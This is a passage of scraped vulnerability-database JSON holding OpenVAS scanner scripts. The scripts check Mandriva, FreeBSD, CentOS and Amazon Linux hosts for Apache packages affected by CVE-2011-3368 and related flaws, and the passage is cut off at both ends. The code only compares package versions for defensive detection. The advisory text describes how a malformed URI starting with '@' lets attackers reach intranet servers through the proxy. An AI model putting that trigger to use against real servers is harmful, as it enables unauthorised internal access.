isrpmvuln(pkg:\"apache-source\", rpm:\"apache-source~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"apache\", rpm:\"apache~2.2.9~12.13mdv2009.0\", rls:\"MNDK_2009.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2017-07-02T21:10:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is missing an update to the system\nas announced in the referenced advisory.", "modified": "2017-04-18T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:70600", "href": "http://plugins.openvas.org/nasl.php?oid=70600", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "#\n#VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\";\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\n\nhttp://httpd.apache.org/security/vulnerabilities_13.html\nhttp://seclists.org/fulldisclosure/2011/Oct/232\nhttp://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\n\n\nif(description)\n{\n script_id(70600);\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-04-18 11:02:14 +0200 (Tue, 18 Apr 2017) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 5963 $\");\n script_name(\"FreeBSD Ports: apache\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, 
b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:54", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "description": "The remote host is missing an update to the system\n as announced in the referenced advisory.", "modified": "2018-10-05T00:00:00", "published": "2012-02-13T00:00:00", "id": "OPENVAS:136141256231070600", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231070600", "type": "openvas", "title": "FreeBSD Ports: apache", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: freebsd_apache19.nasl 11762 2018-10-05 10:54:12Z cfischer $\n#\n# Auto generated from VID d8c901ff-0f0f-11e1-902b-20cf30e32f6d\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.70600\");\n script_tag(name:\"creation_date\", value:\"2012-02-13 01:48:16 +0100 (Mon, 13 Feb 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-05 12:54:12 +0200 (Fri, 05 Oct 2018) $\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3368\");\n script_version(\"$Revision: 11762 $\");\n script_name(\"FreeBSD Ports: apache\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsd\", \"ssh/login/freebsdrel\");\n\n script_tag(name:\"insight\", value:\"The following packages are affected:\n\n apache\n apache+ssl\n apache+ipv6\n apache+mod_perl\n apache+mod_ssl\n apache+mod_ssl+ipv6\n ru-apache-1.3\n ru-apache+mod_ssl\n\nCVE-2011-3368\nThe mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42,\n2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly\ninteract with use of (1) RewriteRule and (2) ProxyPassMatch pattern\nmatches for configuration of a reverse proxy, which allows remote\nattackers to send requests to intranet servers via a malformed URI\ncontaining an initial @ (at sign) character.\");\n\n script_tag(name:\"solution\", value:\"Update your system with the appropriate patches or\n software upgrades.\");\n\n script_xref(name:\"URL\", 
value:\"http://httpd.apache.org/security/vulnerabilities_13.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2011/Oct/232\");\n script_xref(name:\"URL\", value:\"http://www.vuxml.org/freebsd/d8c901ff-0f0f-11e1-902b-20cf30e32f6d.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update to the system\n as announced in the referenced advisory.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-bsd.inc\");\n\nvuln = FALSE;\ntxt = \"\";\n\nbver = portver(pkg:\"apache\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = 
portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the 'httpd' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881436", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881436\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, 
{"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-11-11T00:00:00", "id": "OPENVAS:1361412562310881032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881032", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 
isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T23:03:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120513", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2011-9)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120513\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:36 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2011-9)\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368 )It was discovered that mod_proxy_ajp incorrectly returned an Internal Server Error response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. 
(CVE-2011-3348 )\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881450", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881450\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. 
In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = 